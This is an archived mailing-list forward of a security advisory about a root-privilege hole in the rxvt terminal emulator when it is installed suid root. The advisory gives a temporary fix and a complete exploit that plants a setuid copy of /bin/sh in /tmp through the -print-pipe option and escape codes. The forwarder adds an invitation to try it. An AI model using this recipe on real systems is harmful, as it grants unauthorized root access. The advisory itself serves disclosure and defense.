[Prev][Next][Index]
[Fwd: SECURITY: rxvt security hole]
Hi,
This one is a REAL alert, try it and you get root in 30 seconds...
Gilad.
David J Meltzer wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> [This was recently forwarded over the linux-alert mailing list. I left
> the full text of the exploit in this post due to the fact that it is
> already quite well publicized. I have not verified the exploit code
> myself. --Jeff.]
>
> There is a major security hole in rxvt, a terminal emulator for X, when it
> is run on systems suid root, as is required on many configurations in order to
> write to the utmp file. It is obvious from the code that this program was
> not written to be run suid root, its a pity that sysadmins that install the
> compiled versions of this sort of code don't see the same warnings of 'run
> suid root at your own risk' that the people that put together a distribution
> with it that way see in the makefile.
> The conditions that allow this particular hole to be exploited is rxvt
> compiled with the PRINT_PIPE option, and is running suid root. The program
> sets the pipe to "lpr", without a pathname, but its even easier than that
> to exploit because we can set the pipe to whatever we want with the -print-pipe
> option on the rxvt command line. Although the programs gives up its root
> privileges when forking to runn a shell or other command, the original program
> continues running suid root the entire execution of the program.
> Because the popen() call runs as root, whatever program that pipe opens
> will execute immediately as root. In order to start the printer pipe, the
> vt100 printer-on command is ESC[5i. The pipe can then be closed with the
> printer-off commad, ESC[4i. Exploiting this is extremely easy.
>
> Program: rxvt
> Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
> rxvt suid root (and compiled with PRINT_PIPE)
> Requirements: account on system, X server
> Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
> Security Compromise: root
> Author: Dave M. (davem@cmu.edu)
> Synopsis: rxvt fails to give up root privileges before
> opening a pipe to a program that can be specified
> by the user.
>
> Exploit:
> 1. Set DISPLAY environment variable if necessary so you can use x clients.
> 2. In user shell:
> $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
> $ chmod +x /tmp/rxbug
> $ rxvt -print-pipe /tmp/rxbug
> 3. In rxvt xclient:
> $ cat
> ESC[5i
> ESC[4i
> (The client will close at this point with a broken pipe)
> 4. $ /tmp/rxsh
> # whoami
> root
> #
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface
>
> iQCVAwUBMO1fMXoDqzGe1QXFAQH+jgP+IgtZw9HYoaSd4aLd0PzSH40JSfPtHc+5
> r3oLGMWxwTrb1f8Dx367LFNwZzvM4QAWkMQ01yjNPFh6fpgMgLPsc2atmn1AWJq+
> ZFpNxQ6yu6/1chDtSh4XNrdJSAOKSrz6Y3T0N+23uCC2feV78eMqe+Trmq9TxCac
> r16NALs+Zwo=
> =BzNN
> -----END PGP SIGNATURE-----
>
> ------------------------------------------------------------------------
> The normal moderators for this newsgroup (Matt Welsh and Lars Wirzenius)
> were bypassed for this announcement; we (Olaf Kirch and Jeff Uphoff)
> have their implicit approval for security announcements, by prior
> arrangement.
> ------------------------------------------------------------------------